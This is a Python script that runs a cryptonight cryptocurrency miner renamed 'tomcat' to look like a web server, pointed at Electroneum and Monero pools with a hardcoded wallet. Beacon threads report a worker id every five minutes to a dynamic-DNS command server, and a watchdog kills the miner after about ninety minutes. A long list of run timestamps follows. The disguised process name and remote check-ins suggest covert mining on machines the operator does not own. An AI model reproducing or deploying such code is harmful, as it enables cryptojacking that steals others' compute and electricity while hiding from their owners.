import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:13:06.106517
#2018-02-17 16:02:04.260493
#2018-02-17 17:49:01.453985
#2018-02-17 19:37:03.280176
#2018-02-17 21:26:07.762061
#2018-02-17 23:10:09.552817
#2018-02-18 00:59:01.780531
#2018-02-18 02:47:06.010620
#2018-02-18 04:36:07.386365
#2018-02-18 06:27:04.352825
#2018-02-18 08:16:07.644026
#2018-02-18 10:05:07.785401
#2018-02-18 11:51:01.265361
#2018-02-18 13:36:05.190493
#2018-02-18 15:26:05.077271
#2018-02-18 17:14:05.138782
#2018-02-18 19:02:06.530140
#2018-02-18 20:49:03.976739
#2018-02-18 22:34:06.190186
#2018-02-19 00:22:02.051016
#2018-02-19 02:07:07.673531
#2018-02-19 03:54:07.487707
#2018-02-19 05:38:03.973742
#2018-02-19 07:27:07.063434
#2018-02-19 09:17:01.803057
#2018-02-19 11:06:08.350041
#2018-02-19 12:53:04.055969
#2018-02-19 14:41:06.520013
#2018-02-19 16:33:04.923707
#2018-02-19 18:19:04.977404
#2018-02-19 20:05:05.577866
#2018-02-19 21:53:06.491134
#2018-02-19 23:39:07.133024
#2018-02-20 01:27:07.478469
#2018-02-20 03:16:08.795917
#2018-02-20 05:02:06.696912
#2018-02-20 06:46:06.940828
#2018-02-20 08:32:06.223290
#2018-02-20 10:16:08.069541
#2018-02-20 12:01:09.163260
#2018-02-20 13:49:06.238318
#2018-02-20 15:34:08.955235
#2018-02-20 17:19:10.345177
#2018-02-20 19:10:08.301281
#2018-02-20 20:59:04.458986
#2018-02-20 22:44:02.042824
#2018-02-21 00:27:05.209406
#2018-02-21 02:15:07.228802
#2018-02-21 04:03:07.822046
#2018-02-21 05:51:06.390952
#2018-02-21 07:41:04.242313
#2018-02-21 09:26:05.944931
#2018-02-21 11:15:10.256715
#2018-02-21 13:03:10.633861
#2018-02-21 14:52:01.605014
#2018-02-21 16:39:07.674945
#2018-02-21 18:29:06.535062
#2018-02-21 20:15:01.545049
#2018-02-21 22:03:05.491551
#2018-02-21 23:51:07.212291
#2018-02-22 01:41:08.059489
#2018-02-22 03:29:08.010246
#2018-02-22 05:17:08.141831
#2018-02-22 07:02:06.891499
#2018-02-22 08:49:07.802284
#2018-02-22 10:38:04.347237
#2018-02-22 12:26:09.723510
#2018-02-22 14:11:02.044878
#2018-02-22 15:58:08.266111
#2018-02-22 17:45:14.506714
#2018-02-22 19:34:02.172242
#2018-02-22 21:26:01.678652
#2018-02-22 23:14:03.814504
#2018-02-23 01:01:08.842858
#2018-02-23 02:49:07.261121
#2018-02-23 04:38:01.777258
#2018-02-23 06:24:08.372719
#2018-02-23 08:10:07.575436
#2018-02-23 10:28:05.467532
#2018-02-23 12:22:01.659386
#2018-02-23 14:11:02.091473
#2018-02-23 16:03:08.727762
#2018-02-23 17:47:07.539823
#2018-02-23 19:36:06.919014
#2018-02-23 21:20:01.414138
#2018-02-23 23:10:09.894470
#2018-02-24 01:05:08.434707
#2018-02-24 02:56:05.053002
#2018-02-24 04:44:04.473937
#2018-02-24 06:29:03.999178
#2018-02-24 08:18:04.845422
#2018-02-24 10:02:02.154353
#2018-02-24 11:59:04.532217
#2018-02-24 13:47:04.871833
#2018-02-24 15:35:08.072199
#2018-02-24 17:32:05.134031
#2018-02-24 19:18:06.851517
#2018-02-24 21:07:05.820334
#2018-02-24 23:40:08.479731
#2018-02-25 03:01:01.942897
#2018-02-25 06:58:05.477996